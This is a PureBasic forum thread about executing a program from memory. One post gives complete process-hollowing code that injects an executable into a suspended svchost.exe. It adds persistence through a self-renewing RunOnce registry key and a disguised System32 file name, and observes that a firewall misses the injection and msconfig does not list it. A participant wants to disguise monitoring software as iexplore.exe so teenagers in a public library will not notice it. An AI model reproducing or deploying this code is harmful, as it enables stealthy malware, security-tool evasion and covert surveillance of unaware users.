Execute EXE from memory Lib

[Inf0Byt3]

No problem

[fsw]

Here:

http://www.purebasic.fr/german/viewtopic.php?t=9172

in the german forum is code to execute a program from memory.

Works pretty good.

If you start the program like RINGS suggested you don't see "Notepad" in the "Task Manager" anymore.

[Inf0Byt3]

Thank you very very much for sowing us

[thefool]

Interesting!

[ricardo]

Here:

http://www.purebasic.fr/german/viewtopic.php?t=9172

in the german forum is code to execute a program from memory.

Works pretty good.

If you start the program like RINGS suggested you don't see "Notepad" in the "Task Manager" anymore.

Interesting!

How to know the path to iexplore.exe? Registry?

[Inf0Byt3]

Just run it like this:

Code: Select all

RunProgram("iexplore.exe","","")

You don't need a valid path since it is added in the environment path.

[Henrik]

@ricardo is it important that it is iexplorer? otherwise you could use Explorer.exe
and get the drive letter with GetWindowsDirectory(

Code: Select all

WinPath.s = Space(#MAX_PATH)
GetWindowsDirectory_(WinPath.s,#MAX_PATH)
injectfile(WinPath.s+"\explorer.exe",buffer) 

Ups. it's Maxus topic, maybe there should be a new topic for the German code

Best Henrik

[ricardo]

@ricardo is it important that it is iexplorer? otherwise you could use Explorer.exe
and get the drive letter with GetWindowsDirectory(

Code: Select all

WinPath.s = Space(#MAX_PATH)
GetWindowsDirectory_(WinPath.s,#MAX_PATH)
injectfile(WinPath.s+"\explorer.exe",buffer) 

Ups. it's Maxus topic, maybe there should be a new topic for the German code

Best Henrik

Thanks for your answer.

Yes, the best solution is using iexplore.exe at least if you want to use this option to create some 'parental control' to surfing.
Kids will not notice that some additional process is running if it shows as iexplore.exe i guess.

[ricardo]

Just run it like this:

Code: Select all

RunProgram("iexplore.exe","","")

You don't need a valid path since it is added in the environment path.

Yes, but its for the code they showed in German forum. Really nice code!!

[Henrik]

@ricardo Oh it was something about a school ?
Well Is it XP-Boxes your running, then why not use "svchost.exe" insted of iexplorer, and use regedit "RunOnce"
this i used when you install and you need to reboot the box and run right away when windows starts again.

When i do this even my ZAPro don't complain about the injection.
But the RunOnce gets delete after the program has run.
Lets say your compiled your program as "rsass.exe" cus it sounds like something that could be en the "%systemroot%\System32\" folder, then copy your rsass.exe to the ..\windows\System32\rsass.exe
And it will run immediately when windows strats up, and just before rsass.exe ends it sets a new RunOnce in the reg.

You need of course to run this code once first time and then reboot your system.

Oh and another thing i dosn't show up in "msconfig -> Start" cuse it was only ment to be used once, but who cares about that

Code: Select all

;// EXE Datei vom Ram ausführen!
;//Fra Tysk forum:
;// http://www.purebasic.fr/german/viewtopic.php?t=9172&postdays=0&postorder=asc&start=0


Prototype.l ZwUnmapViewOfSectionPT(Processhandle.l,BaseAdress.l)
ntdll = GetModuleHandle_("ntdll.dll")
Global ZwUnmapViewOfSection_.ZwUnmapViewOfSectionPT = GetProcAddress_(ntdll,"ZwUnmapViewOfSection")
Global WinPath.s
Structure IMAGE_SECTION_HEADER
  Name.b[8]
  StructureUnion
    PhysicalAddress.l
    VirtualSize.l
  EndStructureUnion
  VirtualAddress.l
  SizeOfRawData.l
  PointerToRawData.l
  PointerToRelocations.l
  PointerToLinenumbers.l
  NumberOfRelocations.w
  NumberOfLinenumbers.w
  Characteristics.l
EndStructure


Procedure injectfile(lpProcessname.s, lpBuffer.l)
;Declare
  Structure IMAGE_SECTION_HEADERS
    a.IMAGE_SECTION_HEADER[95]
  EndStructure
 
  Result.l = 0
  Startupinfo.STARTUPINFO
  ProcessInfo.PROCESS_INFORMATION
  Context.CONTEXT
  BaseAddress.l
  lpNumberOfBytesRead.l
  lpNumberOfBytesWritten.w
  *NtHeaders.IMAGE_NT_HEADERS
  *Sections.IMAGE_SECTION_HEADERS
  i.l

;---
Result = #False
ZeroMemory_(@StartupInfo, SizeOf(STARTUPINFO));
StartupInfo\cb = SizeOf(STARTUPINFO)
StartupInfo\dwFlags = #STARTF_USESHOWWINDOW
StartupInfo\wShowWindow = #SW_SHOW

If CreateProcess_(lpProcessname,#NUL,#NUL,#NUL,#False,#CREATE_SUSPENDED,#NUL,#NUL,StartupInfo,@ProcessInfo)
;If CreateProcess_(#NUL,lpProcessname,#NUL,#NUL,#False,#CREATE_SUSPENDED,#NUL,#NUL,StartupInfo,@ProcessInfo)

  Context\ContextFlags = #CONTEXT_INTEGER
  GetThreadContext_(ProcessInfo\hThread, Context);
  ReadProcessMemory_(ProcessInfo\hProcess,Context\Ebx+8,@BaseAddress,SizeOf(BaseAddress),@lpNumberOfBytesRead)
 
  If ZwUnmapViewOfSection_(ProcessInfo\hProcess,BaseAddress) >= 0
   
    *adr.IMAGE_DOS_HEADER = lpBuffer
    *NtHeaders = lpBuffer + *adr\e_lfanew
   
    BaseAddress = VirtualAllocEx_(ProcessInfo\hProcess,*NtHeaders\OptionalHeader\ImageBase,*NtHeaders\OptionalHeader\SizeOfImage,#MEM_RESERVE | #MEM_COMMIT, #PAGE_READWRITE)
    WriteProcessMemory_(ProcessInfo\hProcess,BaseAddress,lpBuffer,*NtHeaders\OptionalHeader\SizeOfHeaders,@lpNumberOfBytesWritten)

    *Sections = @*NtHeaders\OptionalHeader + *NtHeaders\FileHeader\SizeOfOptionalHeader
   
    For i = 0 To *NtHeaders\FileHeader\NumberOfSections-1
WriteProcessMemory_(ProcessInfo\hProcess,BaseAddress+*Sections\a[i]\VirtualAddress,lpBuffer+*Sections\a[i]\PointerToRawData,*Sections\a[i]\SizeOfRawData,@lpNumberOfBytesWritten)
    Next
   
    WriteProcessMemory_(ProcessInfo\hProcess,Context\Ebx+8,@BaseAddress,SizeOf(BaseAddress),@lpNumberOfBytesWritten)
    Context\Eax = BaseAddress + *NtHeaders\OptionalHeader\AddressOfEntryPoint
    Result = SetThreadContext_(ProcessInfo\hThread, Context)
    If Result
          ResumeThread_(ProcessInfo\hThread)
        Else
          TerminateProcess_(ProcessInfo\hProcess, 0);
          CloseHandle_(ProcessInfo\hProcess)
          CloseHandle_(ProcessInfo\hThread)
    EndIf
   
   
  EndIf
EndIf

EndProcedure



WinPath.s = Space(#MAX_PATH)
GetWindowsDirectory_(WinPath.s,#MAX_PATH)
If ReadFile(0,WinPath.s+"\System32\notepad.exe")
  buffer = AllocateMemory(Lof(0)) ; Datei ganz normal in einen buffer lesen
  ReadData(0,buffer,Lof(0))
  CloseFile(0)
EndIf

injectfile(WinPath.s+"\System32\svchost.exe",buffer) ; nun führen wir den buffer im addressraum von paint aus!

Delay(1000)

If RegCreateKeyEx_(#HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\RunOnce", 0, 0, #REG_OPTION_NON_VOLATILE, #KEY_ALL_ACCESS, 0, @NewKey, @KeyInfo) = #ERROR_SUCCESS 
  StringBuffer$ = WinPath.s+"\System32\rsass.exe"     ; change Path to a string with the full path to your program!!!
  RegSetValueEx_(NewKey, "TestRsass", 0, #REG_SZ,  StringBuffer$, Len(StringBuffer$)+1)   ; change "Programname" to your individual name
  RegCloseKey_(NewKey) 
EndIf


; Filename.s=Space(1024)
; myFilename=GetModuleFileName_(0,Filename,1024)
; injectfile(Filename,buffer) ; nun führen wir den buffer im addressraum von uns selber(kopie) aus!

Best Henrik

[ricardo]

@ricardo Oh it was something about a school ?

Its about a public library in my town, mainly used by teenagers and they are damm smart!

Thats why i guess if the app is runned as iexplore.exe will be harder for them to notice that there are something unusuall running. But i need to find a way to know the path to iexplore.exe because im not sure its slways in same path.

Thanks for your help and comments!!

[ricardo]

Its possible to convert this code to PB 3.94?

[stubbsi]

you point us to this topic, but the link to download no longer works???

[Sanders]

please can someone post a working link to the fshrink package (zip) with source

please

Sanders

[Maxus]

Look in first Post. Link is Work.